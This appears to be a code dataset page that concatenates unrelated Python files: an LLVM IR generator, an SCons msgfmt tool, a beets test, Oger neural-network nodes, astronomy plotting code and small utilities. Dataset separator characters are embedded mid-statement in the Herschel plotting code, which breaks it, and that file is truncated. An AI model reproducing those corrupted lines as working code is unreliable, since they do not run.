    if tree[0] == "Program":
        for t in tree[1]:
            code_gen(t)
    elif tree[0] == "=":
        # Allocate a stack slot per assignment and remember the target name.
        last_var = tree[1][0]
        var_dict[last_var] = builder.alloca(ir.FloatType())
        builder.store(code_gen(tree[2]), var_dict[last_var])
    elif tree[0] == "@":
        return builder.fadd(code_gen(tree[1]), code_gen(tree[2]))
    elif tree[0] == "$":
        return builder.fsub(code_gen(tree[1]), code_gen(tree[2]))
    elif tree[0] == "#":
        return builder.fmul(code_gen(tree[1]), code_gen(tree[2]))
    elif tree[0] == "&":
        return builder.fdiv(code_gen(tree[1]), code_gen(tree[2]))
    elif tree[0] in var_dict:
        # Identifier leaf: load the previously stored value.
        return builder.load(var_dict[tree[0]])
    elif isinstance(float(tree[0]), float):
        # Numeric leaf; float() raises ValueError for anything else.
        return ir.Constant(ir.FloatType(), float(tree[0]))
#main function for the ir generator
def run():
    """Parse the input program and lower it into an LLVM module.

    The program is wrapped in a float ``main()`` returning the value of the
    last variable assigned.
    """
    global builder
    tree = main()
    flttyp = ir.FloatType() # create float type
    fnctyp = ir.FunctionType(flttyp, ()) # create function type to return a float
    module = ir.Module(name="ula") # create module named "ula"
    func = ir.Function(module, fnctyp, name="main") # create "main" function
    block = func.append_basic_block(name="entry") # create block "entry" label
    builder = ir.IRBuilder(block) # create irbuilder to generate code
    code_gen(tree) # call code_gen() to traverse tree & generate code
    builder.ret(builder.load(var_dict[last_var])) # specify return value
    return module
if __name__ == "__main__":
    module = run()
    # Write the generated IR next to the input file, with an .ir extension.
    outfilename = os.path.splitext(infilename)[0] + ".ir"
    ir_text = str(module).strip()
    print(ir_text)
    # Context manager closes the output file even if printing fails
    # (the original relied on an explicit close()).
    with open(outfilename, "w") as outfile:
        print(ir_text, file=outfile)
|
h4ck3rm1k3/OpenWrt-Firefly-SDK | staging_dir/host/lib/scons-2.3.1/SCons/Tool/msgfmt.py | Python | gpl-2.0 | 4,460 | 0.015919 | """ msgfmt tool """
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
__revision__ = "src/engine/SCons/Tool/msgfmt.py 2014/03/02 14:18:15 garyo"
from SCons.Builder import BuilderBase
#############################################################################
class _MOFileBuilder(BuilderBase):
    """ The builder class for `MO` files.

    The reason for this builder to exist and its purpose is quite similar
    as for `_POFileBuilder`. This time, we extend list of sources, not targets,
    and call `BuilderBase._execute()` only once (as we assume single-target
    here).
    """

    def _execute(self, env, target, source, *args, **kw):
        # Here we add support for 'LINGUAS_FILE' keyword. Emitter is not
        # suitable in this case, as it is called too late (after multiple
        # sources are handled by the single_source builder).
        import SCons.Util
        from SCons.Tool.GettextCommon import _read_linguas_from_files
        linguas_files = None
        if env.has_key('LINGUAS_FILE') and env['LINGUAS_FILE'] is not None:
            linguas_files = env['LINGUAS_FILE']
            # This should prevent from endless recursion.
            env['LINGUAS_FILE'] = None
        # We read only languages. Suffixes shall be added automatically.
        linguas = _read_linguas_from_files(env, linguas_files)
        if SCons.Util.is_List(source):
            source.extend(linguas)
        elif source is not None:
            source = [source] + linguas
        else:
            source = linguas
        result = BuilderBase._execute(self, env, target, source, *args, **kw)
        if linguas_files is not None:
            # Restore the keyword so later builders can still see it.
            env['LINGUAS_FILE'] = linguas_files
        return result
#############################################################################
#############################################################################
def _create_mo_file_builder(env, **kw):
    """ Create builder object for `MOFiles` builder """
    import SCons.Action
    # FIXME: What factory use for source? Ours or their?
    kw['action'] = SCons.Action.Action('$MSGFMTCOM','$MSGFMTCOMSTR')
    kw['suffix'] = '$MOSUFFIX'
    kw['src_suffix'] = '$POSUFFIX'
    kw['src_builder'] = '_POUpdateBuilder'
    # Each MO target is compiled from exactly one PO source.
    kw['single_source'] = True
    return _MOFileBuilder(**kw)
#############################################################################
#############################################################################
def generate(env, **kw):
    """ Generate `msgfmt` tool """
    import SCons.Util
    from SCons.Tool.GettextCommon import _detect_msgfmt
    try:
        env['MSGFMT'] = _detect_msgfmt(env)
    except Exception:
        # Fall back to a bare 'msgfmt' on PATH when detection fails. The
        # original bare `except:` would also have swallowed
        # KeyboardInterrupt/SystemExit.
        env['MSGFMT'] = 'msgfmt'
    env.SetDefault(
        MSGFMTFLAGS = [ SCons.Util.CLVar('-c') ],
        MSGFMTCOM = '$MSGFMT $MSGFMTFLAGS -o $TARGET $SOURCE',
        MSGFMTCOMSTR = '',
        MOSUFFIX = ['.mo'],
        POSUFFIX = ['.po']
    )
    env.Append( BUILDERS = { 'MOFiles' : _create_mo_file_builder(env) } )
#############################################################################
#############################################################################
def exists(env):
    """ Check if the tool exists """
    from SCons.Tool.GettextCommon import _msgfmt_exists
    try:
        return _msgfmt_exists(env)
    except Exception:
        # Treat any detection failure as "tool unavailable", but do not
        # swallow KeyboardInterrupt/SystemExit as the bare except did.
        return False
#############################################################################
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
kareemallen/beets | test/test_vfs.py | Python | mit | 1,780 | 0.000562 | # -*- coding: utf-8 -*-
# This file is part of beets.
# Copyright 2015, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Tests for the virtual filesystem builder.."""
from __future__ import (division, absolute_import, print_function,
unicode_literals)
from test import _common
from test._common import unittest
from beets import library
from beets import vfs
class VFSTest(_common.TestCase):
    """Check that the virtual filesystem tree reflects the library contents.

    A stray dataset separator in the middle of the `class` keyword has
    been removed.
    """

    def setUp(self):
        super(VFSTest, self).setUp()
        # In-memory library with one singleton track and one album track.
        self.lib = library.Library(':memory:', path_formats=[
            ('default', 'albums/$album/$title'),
            ('singleton:true', 'tracks/$artist/$title'),
        ])
        self.lib.add(_common.item())
        self.lib.add_album([_common.item()])
        self.tree = vfs.libtree(self.lib)

    def test_singleton_item(self):
        self.assertEqual(self.tree.dirs['tracks'].dirs['the artist'].
                         files['the title'], 1)

    def test_album_item(self):
        self.assertEqual(self.tree.dirs['albums'].dirs['the album'].
                         files['the title'], 2)
def suite():
    """Collect this module's tests into a suite for the test runner."""
    loader = unittest.TestLoader()
    return loader.loadTestsFromName(__name__)
if __name__ == b'__main__':
    # NOTE(review): b'__main__' only compares equal to __name__ under
    # Python 2 (where bytes == str); under Python 3 this guard never
    # fires — confirm which interpreters this file must support.
    unittest.main(defaultTest='suite')
|
npinto/Oger | Oger/gradient/models.py | Python | gpl-3.0 | 2,883 | 0.005897 | """
Several pre-defined models that use the gradient nodes.
"""
import mdp
import Oger
import trainers
# TODO: The Autoencoder has not been tested yet.
class MLPNode(mdp.Node):
    """Defines a multilayer perceptron with a hidden layer of tanh units.

    (Docstring previously contained stray dataset-separator characters.)
    """

    # NOTE(review): the default `trainer` is a single shared
    # GradientDescentTrainer instance created at class-definition time;
    # if the trainer keeps state, all default-constructed MLPNodes share
    # it — confirm this is intended.
    def __init__(self, input_dim, output_dim, hidden_dim=100,
                 trainer=trainers.GradientDescentTrainer(), loss='mse', dtype='float64'):
        """Initializes and constructs a multilayer perceptron.

        Arguments:
            - input_dim: input dimensionality
            - output_dim: output dimensionality
            - hidden_dim: number of hidden units
            - trainer: gradient based trainer to use, default: GradientDescentTrainer
            - loss: type of loss to minimize. 'mse' uses linear outputs and
              minimizes mean squared error; 'ce' uses softmax outputs and
              minimizes cross-entropy error. Any other value leaves the
              transfer/loss unbound and raises NameError below.
        """
        super(MLPNode, self).__init__(input_dim, output_dim, dtype)

        if loss == 'mse':
            transfer = Oger.utils.LinearFunction()
            loss_f = Oger.utils.mse
        if loss == 'ce':
            transfer = Oger.utils.SoftmaxFunction()
            loss_f = Oger.utils.ce

        # TODO: Turn these into normal perceptron nodes once the extension
        # mechanism is fixed.
        perceptron1 = Oger.gradient.GradientPerceptronNode(input_dim, hidden_dim,
                                                           transfer_func=Oger.utils.TanhFunction)
        perceptron2 = Oger.gradient.GradientPerceptronNode(hidden_dim, output_dim,
                                                           transfer_func=transfer)

        # This is a flow.
        self.layers = perceptron1 + perceptron2
        self._bpnode = Oger.gradient.BackpropNode(self.layers, trainer, loss_f)

    def _train(self, x, t):
        """Train the perceptron to produce the desired output 't'."""
        self._bpnode.train(x=x, t=t)

    def _execute(self, x):
        return self._bpnode.execute(x)

    def is_trainable(self):
        return True

    def is_invertible(self):
        return False

    def _get_supported_dtypes(self):
        return ['float32', 'float64']
class AutoencoderNode(MLPNode):
    """Use a multilayer perceptron to reconstruct its input."""

    def __init__(self, input_dim, hidden_dim=100, trainer=trainers.GradientDescentTrainer(),
                 dtype='float64'):
        # An autoencoder is an MLP whose output layer has the same
        # dimensionality as its input (output_dim == input_dim), trained
        # with mean-squared-error reconstruction loss.
        super(AutoencoderNode, self).__init__(input_dim, input_dim, hidden_dim, trainer,
                                              loss='mse', dtype=dtype)

    def _train(self, x):
        """Train the Autoencoder to reconstruct 'x'."""
        self._bpnode.train(x, x)

    def get_encoder(self):
        """Return the first PerceptronNode layer that encodes the input."""
        return self.layers[0]
|
sniemi/SamPy | herschel/plotmergers3.py | Python | bsd-2-clause | 24,711 | 0.00518 | """
Generates some prediction plots for the Herschel I paper.
:author: Sami-Matias Niemi
:contact: sammy@sammyniemi.com
:version: 0.5
"""
import matplotlib
matplotlib.use('PS')
#matplotlib.use('Agg')
matplotlib.rc('text', usetex=True)
matplotlib.rcParams['font.size'] = 17
matplotlib.rc('xtick', labelsize=14)
matplotlib.rc('axes', linewidth=1.1)
matplotlib.rcParams['legend.fontsize'] = 12
matplotlib.rcParams['legend.handlelength'] = 3
matplotlib.rcParams['xtick.major.size'] = 5
matplotlib.rcParams['ytick.major.size'] = 5
import os
import pylab as P
import numpy as N
import SamPy.db.sqlite as sq
import SamPy.astronomy.datamanipulation as dm
def plotMergerFractions(query,
                        xlabel, ylabel,
                        output, out_folder,
                        mergetimelimit=0.25,
                        mstarmin=8.0,
                        mstarmax=11.5,
                        mbins=15,
                        ymin=-0.001,
                        ymax=1.01,
                        logscale=False):
    """
    Plot merger fractions as a function of the first queried column.

    Bins galaxies returned by `query` (columns: mass-like quantity, time
    since last merger, time since last major merger, in Gyr) and draws the
    fraction of never-merged / young- and old- minor and major mergers per
    bin, saving the figure to out_folder + output.

    NOTE(review): relies on module-level globals `path` and `db` for the
    database location — confirm they are set before calling.
    """
    #get data, all galaxies
    data = sq.get_data_sqliteSMNfunctions(path, db, query)
    #mstar = N.log10(data[:, 0])
    mstar = data[:, 0]
    tmerge = data[:, 1]
    tmajor = data[:, 2]
    print N.min(mstar), N.max(mstar)
    #masks
    # "Young" = merged within mergetimelimit Gyr; "old" = within 0.5 Gyr.
    # Major-merger masks take precedence over minor-merger ones.
    nomergeMask = tmerge < 0.0
    majorsMask = (tmajor > 0.0) & (tmajor <= mergetimelimit)
    majorsMask2 = (tmajor > mergetimelimit) & (tmajor <= 0.5)
    mergersMask = (tmerge > 0.0) & (tmerge <= mergetimelimit) &\
                  (majorsMask == False) & (majorsMask2 == False)
    mergersMask2 = (tmerge > mergetimelimit) & (tmerge <= 0.5) &\
                   (majorsMask2 == False)
    #bin the data
    mids, numbs = dm.binAndReturnMergerFractions2(mstar,
                                                  nomergeMask,
                                                  mergersMask,
                                                  majorsMask,
                                                  mergersMask2,
                                                  majorsMask2,
                                                  mstarmin,
                                                  mstarmax,
                                                  mbins,
                                                  logscale)
    #the fraction of mergers
    noMergerFraction = [float(x[1]) / x[0] for x in numbs]
    mergerFraction = [float(x[2]) / x[0] for x in numbs]
    majorMergerFraction = [float(x[3]) / x[0] for x in numbs]
    mergerFraction2 = [float(x[4]) / x[0] for x in numbs]
    majorMergerFraction2 = [float(x[5]) / x[0] for x in numbs]
    #sanity check: the five fractions should sum to 1 in each bin
    for a, b, c, d, e in zip(noMergerFraction, mergerFraction, majorMergerFraction,
                             mergerFraction2, majorMergerFraction2):
        print a + b + c + d + e
    #make the figure
    # NOTE(review): subplots_adjust only runs in the non-PostScript branch —
    # confirm the asymmetry is intentional.
    if 'ps' in output:
        fig = P.figure()
    else:
        fig = P.figure(figsize=(10, 10))
        fig.subplots_adjust(left=0.08, bottom=0.07,
                            right=0.97, top=0.93)
    ax1 = fig.add_subplot(111)
    #draw lines ["-","--","-.",":"]
    ax1.plot(mids, noMergerFraction, 'k-', lw=2.6,
             label='Never Merged')
    ax1.plot(mids, majorMergerFraction, ls='-', lw=2.6, c='0.3',
             label='Young Major Merger')
    ax1.plot(mids, mergerFraction, ls='-.', lw=2.6, c='0.2',
             label='Young Minor Merger')
    ax1.plot(mids, majorMergerFraction2, ls='--', lw=2.6, c='0.4',
             label='Old Major Merger')
    ax1.plot(mids, mergerFraction2, ls=':', lw=2.6, c='0.5',
             label='Old Minor Merger')
    #labels
    ax1.set_xlabel(xlabel)
    ax1.set_ylabel(ylabel)
    #limits
    ax1.set_ylim(ymin, ymax)
    #add annotate
    P.text(0.5, 0.93, 'All galaxies\n$2 \leq z < 4$',
           horizontalalignment='center',
           verticalalignment='center',
           transform=ax1.transAxes)
    #legend and save
    P.legend(loc='upper left')
    P.savefig(out_folder + output)
def plotMergerFractions2(query,
xlabel, ylabel,
output, out_folder,
mergetimelimit=0.25,
mstarmin=8.0,
mstarmax=11.5,
mbins=15,
ymin=0.0,
ymax=1.0,
logscale=False):
#get data, all galaxies
data = sq.get_data_sqliteSMNfunctions(path, db, query)
if logscale:
mstar = N.log10(data[:, 0])
logscale = False
else:
mstar = data[:, 0]
print N.min(mstar), N.max(mstar)
tmerge = data[:, 1]
tmajor = data[:, 2]
#masks
nomergeMask = tmerge < 0.0
majorsMask = (tmajor > 0.0) & (tmajor <= mergetimelimit)
majorsMask2 = (tmajor > mergetimelimit)
mergersMask = (tmerge > 0.0) & (tmerge <= mergetimelimit) &\
(majorsMask == False) & (majorsMask2 == False)
mergersMask2 = (nomergeMask == False) & (majorsMask == False) &\
(mergersMask == False) & (majorsMask2 == False)
#bin the data
mids, numbs = dm.binAndReturnMergerFractions2(mstar,
nomergeMask,
mergersMask,
majorsMask,
mergersMask2,
majorsMask2,
mstarmin,
mstarmax,
mbins,
logscale)
#the fraction of mergers
noMergerFraction = N.array([float(x[1]) / x[0] for x in numbs])
mergerFraction = N.array([float(x[2]) / x[0] for x in numbs])
majorMergerFraction = N.array([float(x[3]) / x[0] for x in numbs])
mergerFraction2 = N.array([float(x[4]) / x[0] for x in numbs])
majorMergerFraction2 = N.array([float(x[5]) / x[0] for x in numbs])
#sanity check
for a, b, c, d, e in zip(noMergerFraction, mergerFraction, majorMergerFraction,
mergerFraction2, majorMergerFraction2):
print a | + b + c + d + e
#make the figure
# fig = P.figure()
fig = P.figure(figsize=(10, 10))
fig.subplots_adjust(left=0.08, bottom=0.1,
right=0.97, top=0.93)
ax1 | = fig.add_subplot(111)
#calculate widths
wd = (mids[1] - mids[0]) * 1.0
#draw bars
ax1.bar(mids, noMergerFraction,
label='Never Merged', align='center',
color='grey', width=wd, hatch='.')
ax1.bar(mids, mergerFraction,
bottom=noMergerFraction, align='center',
label='Minor Merger: $T \leq %.0f$ Myr' % (mergetimelimit * 1000.),
color='red', width=wd, hatch='/')
ax1.bar(mids, mergerFraction2, align='center',
bottom=noMergerFraction + mergerFraction,
label='Minor Merger: $T > %.0f$ Myr' % (mergetimelimit * 1000.),
color='blue', width=wd, hatch='|')
ax1.bar(mids, majorMergerFraction, align='center',
bottom=noMergerFraction + mergerFraction + mergerFraction2,
label='Major Merger: $T \leq %.0f$ Myr' % (mergetimelimit * 1000.),
color='magenta', width=wd, hatch='x')
ax1.bar(mids, majorMergerFraction2, align='center',
bottom=noMergerFraction + mergerFraction + mergerFraction2 + majorMergerFraction,
label='Major Merger: $T > %.0f$ Myr' % (mergetimelimit * 1000.),
|
ItsLastDay/academic_university_2016-2018 | subjects/BigData/hw01/fourth_group/gen.py | Python | gpl-3.0 | 409 | 0.007335 | from datetime import timedelta, date
def daterange(start_date, end_date):
    """Yield each date from start_date (inclusive) up to end_date (exclusive)."""
    current = start_date
    one_day = timedelta(days=1)
    while current < end_date:
        yield current
        current += one_day
# Script body: for every day in the range, emit the negative- and
# positive-runner shell commands with an ISO-formatted date argument.
start_date = date(2017, 9, 30)
end_date = date(2017, 10, 23)  # exclusive upper bound (last emitted day is 10-22)
for single_date in daterange(start_date, end_date):
    # Single-string print works identically under Python 2 and Python 3,
    # unlike the original Python-2-only comma-separated print statement.
    stamp = single_date.strftime("%Y-%m-%d")
    print('./neg_runner.sh ' + stamp)
    print('./pos_runner.sh ' + stamp)
|
gromacs/copernicus | cpc/server/state/asset.py | Python | gpl-2.0 | 958 | 0.003132 | # This file is part of Copernicus
# http://www.copernicus-computing.org/
#
# Copyright (C) 2011, Sander Pronk, Iman Pouya, Erik Lindahl, and others.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as published
# by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
class Asset(object):
    """Registry of asset kinds tracked in the server state.

    Each asset kind has a name that doubles as its on-disk directory name.
    """

    @staticmethod
    def cmdOutput():
        """Return the name of the command-output asset kind."""
        return "cmdOutput"

    @staticmethod
    def getDirs():
        """Return the directory names for every known asset kind."""
        dirs = []
        dirs.append(Asset.cmdOutput())
        return dirs
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.